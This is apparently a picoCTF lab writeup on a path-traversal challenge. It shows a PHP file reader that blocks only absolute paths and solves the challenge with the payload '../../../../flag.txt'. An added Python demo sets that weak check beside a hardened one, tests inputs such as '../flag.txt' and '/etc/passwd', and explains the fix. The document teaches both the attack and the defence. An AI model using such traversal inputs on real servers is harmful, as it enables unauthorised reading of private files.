## Home (other picoCTF writeups)

https://hackmd.io/@sunfrancis12/ry_LLAgp3

Author: [National Taichung University of Education White Hat Club (台中教育大學 白帽社)](https://hackmd.io/@ntcuhack/index) - sunfrancis12

## Forbidden Paths

From the challenge description we can tell this is a path traversal challenge.

Open the web page and view its source. The source is as follows:

```
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="style.css">
    <title>Web eReader</title>
</head>
<body>
    <h1>Web eReader</h1>
    <p>..</p>
    <p>divine-comedy.txt</p>
    <p>oliver-twist.txt</p>
    <p>the-happy-prince.txt</p>
    <form role="form" action="read.php" method="post">
        <input type="text" name="filename" placeholder="Filename" required></br>
        <button type="submit" name="read">Read</button>
    </form>
</body>
</html>
```

We enter `read.php` as the filename to see whether the page will read its own source for us. The contents of `read.php` are returned as follows:

```
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="style.css">
    <title>Web eReader</title>
</head>
<body>
<!DOCTYPE html> <br>
<html lang="en"> <br>
<head> <br>
    <meta charset="UTF-8"> <br>
    <meta name="viewport" content="width=device-width, initial-scale=1.0"> <br>
    <meta http-equiv="X-UA-Compatible" content="ie=edge"> <br>
    <link rel="stylesheet" href="style.css"> <br>
    <title>Web eReader</title> <br>
</head> <br>
<body> <br>
 <br>
<?php <br>
$firstChar = $_POST['filename'][0]; <br>
 <br>
if( strcmp($firstChar, '/') == 0 ) <br>
{ <br>
    echo "Not Authorized"; <br>
} <br>
else <br>
{ <br>
    if (file_exists($_POST['filename'])) { <br>
 <br>
        $file = fopen($_POST['filename'], 'r'); <br>
 <br>
        while(! feof($file)) <br>
        { <br>
            $line = fgets($file); <br>
            echo $line. "<br>"; <br>
        } <br>
 <br>
        fclose($file); <br>
    } else { <br>
        echo "File does not exist"; <br>
    } <br>
} <br>
?> <br>
</body> <br>
</html> <br>
<br>
</body>
</html>
```

It looks like `read.php` only checks whether character `0` of the POSTed filename is `"/"`, i.e. it only rejects absolute paths:

```
$firstChar = $_POST['filename'][0];
if( strcmp($firstChar, '/') == 0 ){
    echo "Not Authorized";
}else{
    .....
}
```

A relative path never starts with `/`, so it passes the check. We therefore only need to submit the file location given in the challenge description, as follows:

```
../../../../flag.txt    # .. means go up one directory
```
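To make the weakness concrete from the defender's side, here is an added example (not code from the writeup or the challenge) that re-expresses the `read.php` first-character check in Python next to a hardened version, which resolves the requested name against a fixed library directory and rejects anything whose canonical path escapes it. The directory layout, file names and flag value are constructed for the demo.

```python
import os
import tempfile


def weak_check_allows(filename: str) -> bool:
    """Mirror of read.php: only a leading '/' is rejected, so any
    relative traversal such as '../flag.txt' is accepted."""
    return not (len(filename) > 0 and filename[0] == "/")


def resolve_within(base_dir: str, filename: str):
    """Hardened variant: join the name to a fixed base directory, canonicalise
    it (collapsing '..' and symlinks), and accept it only if the result still
    lies inside the base. Returns the resolved path or None when rejected."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def demo():
    """Build a constructed layout (library/ holds the books, flag.txt sits one
    level above it) and compare both checks on the same inputs."""
    root = tempfile.mkdtemp()
    lib = os.path.join(root, "library")
    os.mkdir(lib)
    with open(os.path.join(lib, "oliver-twist.txt"), "w") as f:
        f.write("Among other public buildings in a certain town...")
    with open(os.path.join(root, "flag.txt"), "w") as f:
        f.write("picoCTF{constructed_placeholder}")  # constructed value

    traversal = "../flag.txt"  # same technique as the writeup, one level up
    return {
        "weak_allows_traversal": weak_check_allows(traversal),
        "weak_blocks_absolute": not weak_check_allows("/etc/passwd"),
        "hardened_blocks_traversal": resolve_within(lib, traversal) is None,
        "hardened_allows_book": resolve_within(lib, "oliver-twist.txt") is not None,
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The realpath-plus-commonpath comparison is what the page's check lacks: it judges the file actually opened, not the first byte of user input.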